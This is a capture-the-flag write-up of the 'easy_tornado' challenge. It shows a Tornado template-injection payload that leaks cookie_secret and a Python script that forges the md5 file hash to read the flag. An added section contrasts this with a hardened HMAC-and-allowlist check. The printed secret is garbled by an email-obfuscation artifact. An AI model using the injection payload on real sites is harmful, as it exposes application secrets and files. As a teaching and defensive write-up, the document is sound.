Vulnerability reproduction: easy_tornado
2022-07-07 08:10:00 【_ s1mple】
[ Environment ]
Windows
[ Tools ]
Firefox
[ Steps ]
Tornado is a Python web application framework.
Opening the challenge shows three files:

flag.txt
/flag.txt
flag in /fllllllllllllag
This shows that the flag is in the file /fllllllllllllag.

welcome.txt
/welcome.txt
render
render is a Python rendering function: it renders variables into a template, so different pages can be produced by passing different parameters.

hints.txt
/hints.txt
md5(cookie_secret+md5(filename))
So filehash=md5(cookie_secret+md5(filename)). Here filename=/fllllllllllllag, so we only need to know cookie_secret to access the flag.

After testing, I found another interface, error, of the form /error?msg=Error, and suspected a server-side template injection (SSTI).
Try /error?msg={{datetime}}. In Tornado's front-end page templates, datetime points to Python's datetime module. Tornado provides some object aliases for quick access to objects; see the official Tornado documentation.

Looking through the documentation shows that cookie_secret is in the settings attribute of the Application object, and that self.application.settings has an alias:
RequestHandler.settings
An alias for self.application.settings.
handler refers to the RequestHandler object that handles the current page. RequestHandler.settings points to self.application.settings, so handler.settings points to RequestHandler.application.settings.
Construct a payload to obtain cookie_secret:
/error?msg={{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
Calculate the filehash value:
import hashlib

def md5(s):
    # Return the hex MD5 digest of a text string (encoded to bytes for Python 3)
    h = hashlib.md5()
    h.update(s.encode())
    return h.hexdigest()

def filehash():
    # filehash = md5(cookie_secret + md5(filename)), as given in hints.txt
    filename = '/fllllllllllllag'
    cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
    print(md5(cookie_secret + md5(filename)))

if __name__ == '__main__':
    filehash()

payload:
file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))
The flag is obtained successfully.
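
The check from hints.txt as a server would perform it, next to a hardened variant, as an added example that is not part of the original post or the challenge's code. The secret values, the FILE_KEY name and the allowlist are constructed assumptions; the hardened form only limits what a leaked cookie_secret can sign, while the template injection itself is fixed by passing msg to a fixed template as a variable instead of rendering it as template source.

```python
import hashlib
import hmac

# Constructed sample values (assumptions), not the challenge's real secrets.
COOKIE_SECRET = "constructed-cookie-secret"
FILE_KEY = b"constructed-file-link-key"   # hypothetical key used only for file links
ALLOWED_FILES = {"/flag.txt", "/welcome.txt", "/hints.txt"}


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def weak_filehash(cookie_secret: str, filename: str) -> str:
    """Scheme from hints.txt: md5(cookie_secret + md5(filename))."""
    return md5_hex(cookie_secret + md5_hex(filename))


def weak_check(cookie_secret: str, filename: str, filehash: str) -> bool:
    """Accepts any filename whose hash was built with cookie_secret, so a
    leaked cookie_secret authorises every path on disk."""
    expected = weak_filehash(cookie_secret, filename)
    return hmac.compare_digest(expected.encode(), filehash.encode())


def strong_filehash(file_key: bytes, filename: str) -> str:
    """HMAC-SHA256 under a key that is not shared with cookie signing."""
    return hmac.new(file_key, filename.encode(), hashlib.sha256).hexdigest()


def strong_check(file_key: bytes, filename: str, filehash: str) -> bool:
    """Allowlist first, then a constant-time MAC comparison on bytes
    (bytes avoid the TypeError compare_digest raises on non-ASCII str)."""
    if filename not in ALLOWED_FILES:
        return False
    expected = strong_filehash(file_key, filename)
    return hmac.compare_digest(expected.encode(), filehash.encode())


if __name__ == "__main__":
    target = "/fllllllllllllag"
    # With cookie_secret known, the weak scheme validates the unlisted file.
    print(weak_check(COOKIE_SECRET, target, weak_filehash(COOKIE_SECRET, target)))
    # Hardened: a correct MAC is still refused for a file outside the allowlist,
    # and a hash derived from cookie_secret does not verify for a listed file.
    print(strong_check(FILE_KEY, target, strong_filehash(FILE_KEY, target)))
    print(strong_check(FILE_KEY, "/hints.txt", weak_filehash(COOKIE_SECRET, "/hints.txt")))
```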